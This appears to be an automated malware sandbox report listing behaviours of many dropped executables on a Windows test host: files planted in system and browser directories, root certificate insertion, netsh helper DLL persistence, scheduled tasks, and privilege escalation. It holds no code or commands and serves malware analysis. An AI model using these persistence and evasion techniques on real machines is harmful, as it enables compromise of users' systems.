File created C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe C:\Windows\SysWOW64\svchost.exe N/A
File opened for modification C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe C:\Windows\SysWOW64\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File created C:\Program Files (x86)\Internet Explorer\fr-FR\SearchApp.exe C:\Users\Admin\AppData\Roaming\3.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files (x86)\SCSI Monitor\scsimon.exe C:\Users\Admin\AppData\Roaming\Opus.exe N/A
File opened for modification C:\Program Files (x86)\SCSI Monitor\scsimon.exe C:\Users\Admin\AppData\Roaming\Opus.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File created C:\Program Files (x86)\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\fr-FR\SearchApp.exe C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Program Files (x86)\Internet Explorer\fr-FR\38384e6a620884a6b69bcc56f80d556f9200171c C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Help\Winlogon.exe C:\Users\Admin\AppData\Roaming\22.exe N/A
File created C:\Windows\Help\active_desktop_render.dll C:\Users\Admin\AppData\Roaming\22.exe N/A
File created C:\Windows\Cursors\WUDFhosts.exe C:\Users\Admin\AppData\Roaming\22.exe N/A
File created C:\Windows\Resources\Ease of Access Themes\schtasks.exe C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Windows\Resources\Ease of Access Themes\3a6fe29a7ceee6587669798812d4baccab0fb913 C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Windows\Cursors\KillProcc.sys C:\Users\Admin\AppData\Roaming\22.exe N/A
File opened for modification C:\Windows\Cursors\TrustedInsteller.exe C:\Users\Admin\AppData\Roaming\22.exe N/A
File created C:\Windows\Help\active_desktop_render_New.dll C:\Windows\SysWOW64\svchost.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\gay.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\TXPlatforn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Opus.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\test.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\22.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Help\Winlogon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\TXPlatforn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\HD____11.19.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\4.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\svchost.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [certificate blob elided] C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5 C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob = [certificate blob elided] C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob = [certificate blob elided] C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [certificate blob elided] C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 694643.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
N/A N/A C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Cursors\WUDFhosts.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
